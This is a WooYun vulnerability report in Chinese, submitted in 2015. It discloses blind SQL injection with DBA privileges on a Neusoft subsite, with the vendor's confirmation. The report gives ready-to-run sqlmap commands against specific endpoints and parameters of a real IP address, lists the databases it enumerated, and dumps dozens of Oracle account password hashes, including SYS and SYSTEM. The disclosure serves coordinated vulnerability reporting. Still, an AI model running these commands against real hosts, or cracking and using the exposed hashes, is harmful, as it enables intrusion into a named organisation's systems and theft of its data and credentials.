当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147428

漏洞标题:东软某分站Oracle盲注(DBA权限)

相关厂商:东软集团

漏洞作者: hecate

提交时间:2015-10-18 21:34

修复时间:2015-12-07 07:12

公开时间:2015-12-07 07:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-18: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

东软某分站Oracle盲注(DBA权限)

详细说明:

地址 http://59.44.43.239/ 存在多处参数注入

sqlmap -u "http://59.44.43.239/emp_pro/GetNewAction.do" --data "operType=queryTheNews&ID=NEWS_ID_9&taglan=2"
参数 ID


sqlmap -u "http://59.44.43.239/emp_pro/getEmployeeInformationAction.do" --data "operType=queryInforForCondition&name=&workarea=%E6%B2%88%E9%98%B3*&leveltype=%E6%8A%80%E6%9C%AF%E7%B1%BB&taglan=2"
参数 name,workarea,leveltype 均可注入


injection3.png


available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] H3ERP
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] RMANADM
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

漏洞证明:

database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CONNECT [1]:
    password hash: NULL
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: E066D214D5421CCC
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] H3ERP [1]:
    password hash: 8B645708BC43C5D1
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: 01F23C025F3F341D
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: 3FB8EF9DB538647C
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] RMANADM [1]:
    password hash: 82B528E1A0C347BB
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
[*] SYS [1]:
    password hash: C89E957D620BC4ED
[*] SYSMAN [1]:
    password hash: 447B729161192C24
[*] SYSTEM [1]:
    password hash: 9CC0ECDD8721C8E3
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL

修复方案:

过滤,上WAF

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-23 07:11

厂商回复:

感谢白帽子提供的漏洞信息,已经通知相关业务部门进行修复 。

最新状态:

暂无